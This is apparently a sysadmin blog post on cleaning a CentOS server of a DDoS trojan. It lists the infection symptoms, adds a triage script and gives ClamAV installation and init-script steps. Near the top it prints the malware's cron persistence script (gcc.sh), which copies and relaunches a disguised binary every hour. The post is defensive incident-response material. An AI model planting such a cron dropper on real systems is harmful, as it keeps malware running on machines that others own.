Updating ClamAV on 64-bit CentOS 5.4
2015-11-21 01:17:33

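Malware symptoms:
 Network traffic is saturated, with the host flooding data to an IP address in Hong Kong. In top, the offending process shows up under a random 10-letter name, while the information under /proc presents it as a common command such as ls or cd; it also sits at the top of the CPU usage list. After the process is killed, a new one is spawned under another random name.
The crontab log keeps showing that a gcc.sh is being executed; a search finds it in /etc/cron.hourly/: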
# cat /etc/cron.hourly/gcc.sh
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
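
The symptoms above translate directly into a triage check. The script below is an added example, not part of the original post; the function names and the optional path arguments are assumptions of the example, and a hit is a lead to inspect rather than proof of infection.

```shell
#!/bin/sh
# Added triage example (not from the original post). The optional path
# arguments are an assumption of this example so that it can also be pointed
# at a mounted disk image or a test tree instead of the live system.

# Report the on-disk artifacts named in the post that exist under root "$1".
check_files() {
    root="${1:-}"
    for f in /etc/cron.hourly/gcc.sh /lib/libudev.so /lib/libudev.so.6; do
        if [ -e "$root$f" ]; then echo "FILE $f"; fi
    done
}

# Report processes whose executable name is exactly 10 letters while argv[0]
# claims another name (the post: random name in top, "ls"/"cd" under /proc).
check_procs() {
    proc="${1:-/proc}"
    for d in "$proc"/[0-9]*; do
        # Kernel threads and processes we cannot read have no usable exe link.
        exe=$(readlink "$d/exe" 2>/dev/null) || continue
        exe="${exe% (deleted)}"   # Linux appends this when the binary was unlinked
        name="${exe##*/}"
        if ! printf '%s\n' "$name" | LC_ALL=C grep -Eq '^[A-Za-z]{10}$'; then
            continue
        fi
        # argv[0] is the first NUL-terminated string in cmdline.
        argv0=$(tr '\000' '\n' 2>/dev/null < "$d/cmdline" | head -n 1)
        if [ "${argv0##*/}" != "$name" ]; then
            echo "PROC ${d##*/} exe=$exe argv0=$argv0"
        fi
    done
}

# Check the live system (run as root to see every process).
check_files
check_procs
```

Legitimate daemons with 10-letter names are not reported as long as their argv[0] matches the executable name.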


Install the ClamAV antivirus software
cd /tmp
wget http://apt.sw.be/redhat/el5/en/x86_64/rpmforge/RPMS/clamd-0.96.2-2.el5.rf.x86_64.rpm
wget http://apt.sw.be/redhat/el5/en/x86_64/rpmforge/RPMS/clamav-db-0.96.2-2.el5.rf.x86_64.rpm
wget http://apt.sw.be/redhat/el5/en/x86_64/rpmforge/RPMS/clamav-0.96.2-2.el5.rf.x86_64.rpm
wget http://apt.sw.be/redhat/el5/en/x86_64/rpmforge/RPMS/clamav-milter-0.96.2-2.el5.rf.x86_64.rpm
wget http://apt.sw.be/redhat/el5/en/x86_64/rpmforge/RPMS/clamav-devel-0.96.2-2.el5.rf.x86_64.rpm
Install:
rpm -ivh clamav-db-0.96.2-2.el5.rf.x86_64.rpm
rpm -ivh clamav-0.96.2-2.el5.rf.x86_64.rpm
rpm -ivh clamav-milter-0.96.2-2.el5.rf.x86_64.rpm
rpm -ivh clamav-devel-0.96.2-2.el5.rf.x86_64.rpm
rpm -ivh clamd-0.96.2-2.el5.rf.x86_64.rpm

# Configure clamd.conf
# vi /etc/clamd.conf
========================================================
#Example   (comment out the Example line)
LogFile /var/log/clamav/clamd.log
LogVerbose yes
LogTime yes
LocalSocket /tmp/clamav.socket
PidFile /var/run/clamd.pid
DatabaseDirectory /usr/share/clamav
MaxDirectoryRecursion 15
ScanMail yes
ScanArchive yes
========================================================
# Start the clamd daemon
# /usr/sbin/clamd
# Configure freshclam.conf
Edit /etc/freshclam.conf
# vi /etc/freshclam.conf
========================================================
#Example    (comment out the Example line)
DatabaseDirectory /usr/share/clamav
UpdateLogFile /var/log/clamav/freshclam.log
LogSyslog yes
LogVerbose yes
DatabaseMirror db.CN.clamav.net
DatabaseMirror database.clamav.net
HTTPProxyServer X.X.X.X
HTTPProxyPort 3128
========================================================
# Update the ClamAV virus database
# /usr/bin/freshclam
Create the clamd init script:
# vi /etc/init.d/clamd
========================================================
#!/bin/bash
#
# clamd   Start/Stop the clam antivirus daemon.
#
# chkconfig: 2345 90 60
# description: clamd is a standard UNIX program that scans for viruses.
# processname: clamd
# config: /etc/clamd.conf
# pidfile: /var/run/clamd.pid
# Source function library.
. /etc/init.d/functions
RETVAL=0
prog="clamd"
progdir="/usr/sbin"
# Lock file that records the service as running (checked by condrestart).
lockfile="/var/lock/subsys/$prog"
# Source configuration
if [ -f /etc/sysconfig/$prog ] ; then
   . /etc/sysconfig/$prog
fi
start() {
       echo -n $"Starting $prog: "
       daemon $progdir/$prog
       RETVAL=$?
       echo
       # clamd writes its own PidFile; only the subsys lock is recorded here.
       [ $RETVAL -eq 0 ] && touch $lockfile
       return $RETVAL
}
stop() {
       echo -n $"Stopping $prog: "
       killproc $prog
       RETVAL=$?
       echo
       [ $RETVAL -eq 0 ] && rm -f $lockfile
       return $RETVAL
}
# Named rhstatus so it does not shadow status() from /etc/init.d/functions.
rhstatus() {
       status $prog
}
restart() {
       stop
       start
}
reload() {
       echo -n $"Reloading clam daemon configuration: "
       killproc $prog -HUP
       RETVAL=$?
       echo
       return $RETVAL
}
# See how we were called.
case "$1" in
start)
       start
       ;;
stop)
       stop
       ;;
restart)
       restart
       ;;
reload)
       reload
       ;;
status)
       rhstatus
       ;;
condrestart)
       # Restart only if the service is currently running.
       [ -f $lockfile ] && restart || :
       ;;
*)
       echo $"Usage: $0 {start|stop|status|reload|restart|condrestart}"
       exit 1
esac
exit 0
========================================================
# Enable clamd at boot
# chmod 755 /etc/init.d/clamd
# /sbin/chkconfig --add clamd
# /sbin/chkconfig clamd on
# clamscan -r test    (recursively scan the test directory for viruses)
